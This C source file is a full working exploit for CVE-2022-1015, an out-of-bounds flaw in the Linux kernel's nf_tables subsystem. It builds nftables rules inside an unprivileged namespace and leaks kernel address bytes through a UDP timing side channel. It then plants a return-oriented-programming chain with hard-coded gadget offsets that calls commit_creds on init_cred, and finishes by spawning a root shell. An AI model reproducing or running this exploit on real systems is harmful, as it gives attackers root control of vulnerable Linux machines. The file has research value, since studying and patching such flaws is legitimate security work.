/*
 * ----------------------------------------------------------------------------
 * "THE BEER-WARE LICENSE" (Revision 42):
 * David Bouman (pql) wrote this file.  As long as you retain this notice you
 * can do whatever you want with this stuff. If we meet some day, and you think
 * this stuff is worth it, you can buy me a beer in return.   Signed, David.
 * ----------------------------------------------------------------------------
 */

#define _GNU_SOURCE 1
#include <stdlib.h>
#include <time.h>
#include <string.h>
#include <stddef.h>
#include <netinet/in.h>
#include <netinet/udp.h>
#include <arpa/inet.h>
#include <errno.h>
#include <sys/mman.h>
#include <sched.h>
#include <unistd.h>
#include <fcntl.h>
#include <sys/prctl.h>
#include <linux/limits.h>
#include <linux/netfilter.h>
#include <linux/netfilter/nf_tables.h>

#include <libmnl/libmnl.h>
#include <libnftnl/table.h>
#include <libnftnl/chain.h>
#include <libnftnl/rule.h>
#include <libnftnl/expr.h>

#include "helpers.h"

struct vuln_expr_params {
    uint32_t min_len;
    uint32_t max_len;
    uint32_t value;
};


void setup_nftables(struct mnl_socket* nl, char* table_name, char* base_chain_name, int* seq)
{
    if (create_table(nl, table_name, AF_INET, seq, NULL) == -1) {
        perror("Failed creating table");
        exit(EXIT_FAILURE);
    }

    printf("[+] Created nft %s\n", table_name);

    struct unft_base_chain_param bp;
    bp.hook_num = NF_INET_LOCAL_OUT;
    bp.prio = 10;

    if (create_chain(nl, table_name, base_chain_name, NFPROTO_IPV4, &bp, seq, NULL)) {
            perror("Failed creating base chain");
            exit(EXIT_FAILURE);
    }

    printf("[+] Created base ipv4 chain %s\n", base_chain_name);
}

static int calc_vuln_expr_params_div(struct vuln_expr_params* result, uint8_t desired, uint32_t min_len, uint32_t max_len, int shift)
{
    uint64_t base_ = (uint64_t)(1) << (32 - shift);
    uint32_t base = (uint32_t)(base_ - 1);

    if (base == 0xffffffff) {
        base = 0xfffffffb; // max actual value 
    }

    for (;;) {
        uint64_t computed = (base * 4) & 0xffffffff;
        uint64_t max_value = computed + (uint64_t)(max_len);
        if (max_value < ((uint64_t)(1) << 32)) {
            break;
        }

        if ( (base & 0xff) != desired) {
            base--;
            continue;
        }

        uint32_t len_at_least = ((uint64_t)1 << 32) - computed;
        uint32_t len_at_most  = len_at_least + 0x50; 
        
        if (min_len > len_at_least) {
            len_at_least = min_len;
        }

        if (max_len < len_at_most) {
            len_at_most = max_len;
        }
        result->max_len = len_at_most;
        result->min_len = len_at_least;
        result->value = base + 4;
        return 0;

    }
    return -1;

}

static int calc_vuln_expr_params(struct vuln_expr_params *result, uint8_t desired, uint32_t min_len, uint32_t max_len)
{
    
    for (int i = 0; i < 3; ++i) {
        int res = calc_vuln_expr_params_div(result, desired, min_len, max_len, i);
        if (!res) {
            return 0;
        }
    }
    
    return -1;
    
}

#define MAGIC 0xdeadbeef0badc0de
int create_base_chain_rule(struct mnl_socket* nl, char* table_name, char* chain_name, uint16_t family, uint64_t* handle, int* seq)
{

    struct nftnl_rule* r = build_rule(table_name, chain_name, family, handle);

    // we start by adding a rule to fetch the destination port
    // UDP header destination port starts at offset +2 and is 2 bytes long
    // we store the result in register 8
    
    rule_add_payload(r, NFT_PAYLOAD_TRANSPORT_HEADER, offsetof(struct udphdr, dest), sizeof(uint16_t), 8);

    // if the destination port does not match, the rule will accept the packet. This will save us a lot of noise,
    // including noise generated by packets sent by our server socket.

    // the server sockets actually have a different stack layout than the client sockets in do_chain, so this is essential.

    uint16_t dest_port = htons(9999);
    rule_add_cmp(r, NFT_CMP_EQ, 8, &dest_port, sizeof dest_port);

    // then, we fetch the first 8 bytes of the the inner header.
    // these need to match our magic value, or else the rule will accept the packet.
    // we do this as a failsafe that guarantees we only process packets we 
    // actually want to process.

    rule_add_payload(r, NFT_PAYLOAD_INNER_HEADER, 0, 8, 8);

    uint64_t magic = MAGIC;
    rule_add_cmp(r, NFT_CMP_EQ, 8, &magic, sizeof magic);

    // If the packet passed these checks, we jump to the auxiliary chain

    rule_add_immediate_verdict(r,  NFT_GOTO, "aux_chain");

    // Commit rule to the kernel
    return send_batch_request(
        nl,
        NFT_MSG_NEWRULE | (NFT_TYPE_RULE << 8),
        NLM_F_CREATE, family, (void**)&r, seq,
        NULL
    );
    
}

int create_infoleak_rule(
    struct mnl_socket* nl, struct nftnl_rule* r, uint8_t cmp, uint8_t pos, uint16_t family, int* seq, int extraflags)
{

    struct vuln_expr_params vuln_params;

    // index 0xff translates to +0x3fc, and there's a kernel address that we can grab.

    if (calc_vuln_expr_params(&vuln_params, 0xff,  0x40, 0x40)) {
        puts("Could not find correct params to trigger OOB read.");
        return -1;
    }

    // we shift by pos*8 so that the first byte of the register will be the one at pos `pos`.
    uint32_t shift_amt = (pos * 8);
    rule_add_bit_shift(r, NFT_BITWISE_RSHIFT, vuln_params.min_len, vuln_params.value, 1, &shift_amt, sizeof shift_amt);
    
    // we compare it to the constant - we can binary search
    
    // if the compared value is greater than our supplied value,
    // we accept the packet. Else, we drop it.

    rule_add_cmp(r, NFT_CMP_GT, 0x15, &cmp, 1);

    rule_add_immediate_verdict(r, NF_DROP, NULL);

    return send_batch_request(
        nl,
        NFT_MSG_NEWRULE | (NFT_TYPE_RULE << 8),
        NLM_F_CREATE | extraflags, family, (void**)&r, seq,
        NULL
    );
}

#define INFOLEAK_RULE_HANDLE 4
uint8_t do_leak_byte(struct mnl_socket* nl, int client_sock, struct sockaddr_in* addr, char* table_name, char* aux_chain_name, uint8_t pos, int* seq)
{

    uint8_t low = 0;
    uint8_t high = 255;
    
    uint8_t mid;

    char msg[16] = {};
    char result[16] = {};
    *(uint64_t*)msg = MAGIC;

    for(;;) {
        
        mid = (high + low) / 2;
        
        printf("bounds (inclusive): [0x%.2hhx, 0x%.2hhx]\n", low, high);

        if (low == high) {
            return mid;
        }

        // Create a rule that replaces the rule with handle INFOLEAK_RULE_HANDLE
        struct nftnl_rule* r = build_rule(table_name, aux_chain_name, NFPROTO_IPV4, NULL);
        nftnl_rule_set_u64(r, NFTNL_RULE_HANDLE, INFOLEAK_RULE_HANDLE);
        
        // The rule is going to compare 
        if (create_infoleak_rule(nl, r, mid, pos, NFPROTO_IPV4, seq, NLM_F_REPLACE)) {
            perror("Could not replace infoleak rule");
            exit(EXIT_FAILURE);
        }

        sendto(client_sock, msg, sizeof msg, 0, (struct sockaddr*)addr, sizeof *addr);

        struct sockaddr_in presumed_server_addr;
        socklen_t presumed_server_addr_len = sizeof presumed_server_addr;

        int nrecv = recvfrom(client_sock, result, sizeof result, 0, (struct sockaddr*)&presumed_server_addr, &presumed_server_addr_len);
        if (!nrecv) {
            puts("[-] Remote socket closed...");
            exit(EXIT_FAILURE);
        } else if (nrecv < 0) { 

            // In case of timeout, value is greater than `mid`
            low = mid + 1;
        } else {
            if (strcmp(result, "MSG_OK")) {
                puts("[-] Something went wrong...");
                exit(EXIT_FAILURE);
            }
            memset(result, 0, sizeof result);
            
            // But if we get a response, the packet arrived at the server and therefore the value is lower than or equal to mid

            high = mid;
        }
    }
}

uint32_t do_leak(struct mnl_socket* nl, struct sockaddr_in* addr, char* table_name, char* aux_chain_name, int* seq)
{

    #define CLIENT_HOST "127.0.0.1"
    #define CLIENT_PORT 8888

    int client_sock = socket(AF_INET, SOCK_DGRAM, IPPROTO_UDP);

    struct sockaddr_in client_addr;
    inet_aton(CLIENT_HOST, &client_addr.sin_addr);
    client_addr.sin_port = htons(CLIENT_PORT);
    client_addr.sin_family = AF_INET;

    if (bind(client_sock, (struct sockaddr*)&client_addr, sizeof client_addr) < 0) {
        perror("client bind");
        return -1;
    }

    // 100ms receive timeout
    // can probably be lower
    struct timespec t = {.tv_sec =  0, .tv_nsec = 1000 * 200};
    setsockopt(client_sock, SOL_SOCKET, SO_RCVTIMEO, &t, sizeof t);
    
    uint8_t results[4] = {};

    for(int i = 1; i < 4; ++i) {
        results[i] = do_leak_byte(nl, client_sock, addr, table_name, aux_chain_name, i, seq);
        printf("[+] Leaked byte %i: %.2hhx\n", i, results[i]);
    }
    
    close(client_sock);
    return *(uint32_t*)results;

}

int simple_handler(int fd)
{
    char buf[4096] = {};
    
    struct sockaddr_in client_addr = {};
    socklen_t client_addr_size = sizeof client_addr;
    size_t conn_id = 0;

    for (;;) {

        int len = recvfrom(fd, buf, sizeof buf - 1, 0, (struct sockaddr*)&client_addr, &client_addr_size);

        if (len <= 0) {
            printf("listener receive failed..\n");
            perror("");
            return -1;
        }
        
        printf("Received message from [%s:%d] (udp) (0x%x bytes):\n", inet_ntoa(client_addr.sin_addr), ntohs(client_addr.sin_port), len);
        hexdump(buf, len, 8);
    }

    close(fd);

    return 0;
}


int leak_handler(int fd)
{
    char buf[4096] = {};
    char send_back[] = "MSG_OK";
    struct sockaddr_in client_addr = {};
    socklen_t client_addr_size = sizeof client_addr;
    size_t conn_id = 0;

    for (;;) {

        int len = recvfrom(fd, buf, sizeof buf - 1, 0, (struct sockaddr*)&client_addr, &client_addr_size);

        if (len <= 0) {
            printf("listener receive failed..\n");
            perror("");
            return -1;
        }
        
        sendto(fd, send_back, sizeof(send_back), 0, (struct sockaddr*)&client_addr, client_addr_size);
    }

    close(fd);

    return 0;
}

void* new_stack;

/* This is where we return after our rop chain */
extern void _after_rop();
void after_rop()
{

    system("id");
    system("sh");
    
}

static int install_rop_chain_rule(struct mnl_socket* nl, uint64_t kernel_base, char* chain, int* seq)
{
   
    // return address is at regs.data[0xca]
    struct vuln_expr_params v;
    
    if (calc_vuln_expr_params(&v, 0xca, 0x00, 0xff)) {
        puts("[-] Cannot find suitable parameters for planting ROP chain.");
        return -1;
    }  
    
    struct nftnl_rule* r = build_rule("exploit_table", chain, NFPROTO_IPV4, NULL);
    //nftnl_rule_set_u64(r, NFTNL_RULE_HANDLE, INFOLEAK_RULE_HANDLE);
    rule_add_payload(r, NFT_PAYLOAD_INNER_HEADER, 8, v.max_len, v.value);
    
    
    int err = send_batch_request(
        nl,
        NFT_MSG_NEWRULE | (NFT_TYPE_RULE << 8),
        NLM_F_CREATE, NFPROTO_IPV4, (void**)&r, seq,
        NULL
    );
    
    if (err) {
        perror("send_batch_request");
        return err;
    }
    
    return v.max_len;

}

void trigger_rop(struct mnl_socket* nl, uint64_t kernel_base, struct sockaddr_in* magic_addr, int rop_length)
{

    // Structures in .data
    #define INIT_NSPROXY_OFF 0x1867360
    #define INIT_PID_NS_OFF 0x1866fe0
    #define INIT_CRED_OFF 0x18675a0

    // Routines in .text
    #define SWITCH_TASK_NAMESPACES_OFF 0xd1040
    #define COMMIT_CREDS_OFF 0xd2430
    #define FIND_TASK_BY_VPID_OFF 0x0c8c80
    #define BPF_GET_CURRENT_TASK_OFF 0x1ebde0
    #define __DO_SOFTIRQ_OFF 0x1000000
    
    // Gadgets
    #define MOV_RDI_RAX_OFF 0xc032fb // constraint: rcx==0
    #define POP_RDI_OFF 0x92610
    #define POP_RSI_OFF 0x676d2
    #define POP_RCX_OFF 0x139a3
    #define POP_RBP_OFF 0x6ffa8d
    #define XOR_ECX_ECX_OFF 0x7110bf
    #define MOV_R13_RCX_POP_RBP_OFF 0xaf089b
    #define POP_R11_R12_RBP_OFF 0x054645
    #define CLI_OFF 0x4df88b
    #define STI_OFF 0xc061c0
    #define MOV_RCX_RAX_OFF 0x2faad4
    #define SWAPGS_SYSRETQ_OFF 0xe000fb
    // Misc.
    #define OLD_TASK_FLAGS_OFF 0x1a554a // 0x40010000

    uint64_t *packet = calloc(1, rop_length + 8);

    packet[0] = 0;
    uint64_t* rop = &packet[1];


    // 0xffffffff819d5cda <__netif_receive_skb_one_core+122> ret
    
    int i = 0;
    #define _rop(x) do { if ((i+1)*8 > rop_length) { puts("ROP TOO LONG"); exit(EXIT_FAILURE);} rop[i++] = (x); } while (0)

    // clear interrupts
    _rop(kernel_base + CLI_OFF);
    
    // make rbp-0x58 point to 0x40010000
    _rop(kernel_base + POP_RBP_OFF);
    _rop(kernel_base + OLD_TASK_FLAGS_OFF + 0x58);
    
    /* Cleanly exit softirq and return to syscall context */
    _rop(kernel_base + __DO_SOFTIRQ_OFF + 418);
    
    // stack frame was 0x60 bytes
    for(int j = 0; j < 12; ++j) _rop(0);

    /* We're already on 128 bytes here */

    // switch_task_namespaces(current, &init_nsproxy)
    _rop(kernel_base + BPF_GET_CURRENT_TASK_OFF);
    _rop(kernel_base + MOV_RDI_RAX_OFF); // rcx happens to aleady be 0
    _rop(kernel_base + POP_RSI_OFF);
    _rop(kernel_base + INIT_NSPROXY_OFF);
    _rop(kernel_base + SWITCH_TASK_NAMESPACES_OFF);

    // commit_cred(&init_cred)
    _rop(kernel_base + POP_RDI_OFF);
    _rop(kernel_base + INIT_CRED_OFF);
    _rop(kernel_base + COMMIT_CREDS_OFF);

    // pass control to system call stack
    // this is offset +0xc0 from our rop chain
    // target is at   +0x168
    _rop(kernel_base + 0x28b2e4); // add rsp, 0x90; pop rbx; pop rbp; ret

    int s = socket(AF_INET, SOCK_DGRAM, IPPROTO_UDP);
    puts("Triggering payload..");
    sendto(s, packet, rop_length + 8, 0, (struct sockaddr*)magic_addr, sizeof *magic_addr);
}

int main(int argc, char** argv, char** envp)
{

    if (argc < 2) {
        puts("[+] Dropping into network namespace");
        
        // We're too lazy to perform uid mapping and such.
        char* new_argv[] = {
            "/usr/bin/unshare",
            "-Urn",
            argv[0],
            "EXPLOIT",
            NULL
        };

        execve(new_argv[0], new_argv, envp);
        puts("Couldn't start unshare wrapper..");
        puts("Recompile the exploit with an appropriate unshare path.");
        exit(EXIT_FAILURE);
    }
    if (strcmp("EXPLOIT", argv[1])) {
        puts("[-] Something went wrong...");
        exit(EXIT_FAILURE);
    }

    // I'm too lazy to talk to NETLINK_ROUTE..
    // Deal with it!
    system("ip link set dev lo up");

    struct mnl_socket* nl = mnl_socket_open(NETLINK_NETFILTER);

    if (mnl_socket_bind(nl, 0, MNL_SOCKET_AUTOPID) < 0) {
        perror("[-] mnl_socket_bind");
        puts("[-] Are you sure you have CAP_NET_ADMIN?..");
        exit(EXIT_FAILURE);
    }
    int seq = time(NULL);
    int err;

    char *table_name = "exploit_table", 
         *base_chain_name = "base_chain",
         *aux_chain_name = "aux_chain";

    setup_nftables(nl, table_name, base_chain_name, &seq);
    
    if (create_chain(nl, table_name, aux_chain_name, NFPROTO_IPV4, NULL, &seq, NULL)) {
            perror("Failed creating auxiliary chain");
            exit(EXIT_FAILURE);
    }
    printf("[+] Created auxiliary chain %s\n", aux_chain_name);

    if (create_base_chain_rule(nl, table_name, base_chain_name, NFPROTO_IPV4, NULL, &seq)) {
        perror("Failed creating base chain rule");
        exit(EXIT_FAILURE);
    }

    puts("[+] Created base chain rule");
    
    // we need to make a rule first in order to replace it
    // in our leaky rule creation. it's a bit of a hack but it works
    // We can also use it to determine whether the system is vulnerable
    // before actually exploiting.
    
    struct vuln_expr_params v;
    
    // offset 0xca and len 0xff is OOB
    if (calc_vuln_expr_params(&v, 0xca, 0x00, 0xff)) {
        puts("[-] Something went horribly wrong...");
        exit(EXIT_FAILURE);
    }  
    
    struct nftnl_rule* aux_rule = build_rule(table_name, aux_chain_name, NFPROTO_IPV4, NULL);
    rule_add_payload(aux_rule, NFT_PAYLOAD_INNER_HEADER, 8, v.max_len, v.value);

    err = send_batch_request(
        nl,
        NFT_MSG_NEWRULE | (NFT_TYPE_RULE << 8),
        NLM_F_CREATE, NFPROTO_IPV4, (void**)&aux_rule, &seq,
        NULL
    );

    if (err) {
        puts(CLR_RED "[+] TARGET IS NOT VULNERABLE to CVE-2022-1015!" CLR_RESET);
        exit(EXIT_FAILURE);
    }

    puts("[+] Succesfully created rule with OOB nft_payload!");
    puts(CLR_GRN "[+] TARGET IS VULNERABLE to CVE-2022-1015!" CLR_RESET);
    puts("[+] Type 'y' to try exploiting the target.");
    puts(CLR_RED "!!!BEWARE: THIS IS LIKELY TO CAUSE A KERNEL PANIC!!!" CLR_RESET);
    
    char a[4] = {};
    read(0, a, 1);

    if (a[0] != 'y') {
        puts("Bye!");
        exit(EXIT_SUCCESS);   
    }

    #define SERVER_HOST "127.0.0.1"
    #define SERVER_PORT 9999

    int pid = setup_listener(SERVER_HOST, SERVER_PORT, leak_handler);
    
    struct sockaddr_in server;
    inet_aton(SERVER_HOST, &server.sin_addr);
    server.sin_port = htons(SERVER_PORT);
    server.sin_family = AF_INET;

    #define LEAK_BASE_OFFSET 0x9ac3ec
    uint32_t leak = do_leak(nl, &server, table_name, aux_chain_name, &seq);
    // first byte might fail due to buggy carry implementation with shift_amt = 0
    // so we just set it. The LSB will always remain constant.

    uint64_t kernel_addr = 0xffffffff00000000 + leak + (LEAK_BASE_OFFSET & 0xff);
    uint64_t kernel_base = kernel_addr - LEAK_BASE_OFFSET;
    
    
    // If the kernel base isn't aligned we should probably not continue.
    if((kernel_base & 0xfffff) != 0) {
        puts("[-] Leak failed.");
        puts("[-] Try changing offsets / lengths / chain types.");
        puts("[-] If all leaked bytes were ff, this is probably because of corrupted loopback state.. RIP");
        exit(EXIT_FAILURE);
    }

    printf("[+] Kernel base @ 0x%.16lx\n", kernel_base);
    stop_listener(pid);
    struct unft_base_chain_param bp;
    bp.hook_num = NF_INET_LOCAL_IN;
    bp.prio = 10;

    if (create_chain(nl, table_name, "base_chain_2", NFPROTO_IPV4, &bp, &seq, NULL)) {
        perror("Failed adding second base chain");
        exit(EXIT_FAILURE);
    }

    err = install_rop_chain_rule(nl, kernel_base, "base_chain_2", &seq);
    if (err < 0) {
        perror("[-] Could not install ROP chain");
        exit(EXIT_FAILURE);
    };

    new_stack = mmap(NULL, 0x4000, PROT_READ | PROT_WRITE, MAP_PRIVATE | MAP_ANONYMOUS, -1, 0) + 0x3ff0;
    trigger_rop(nl, kernel_base, &server, err);
    after_rop();
}
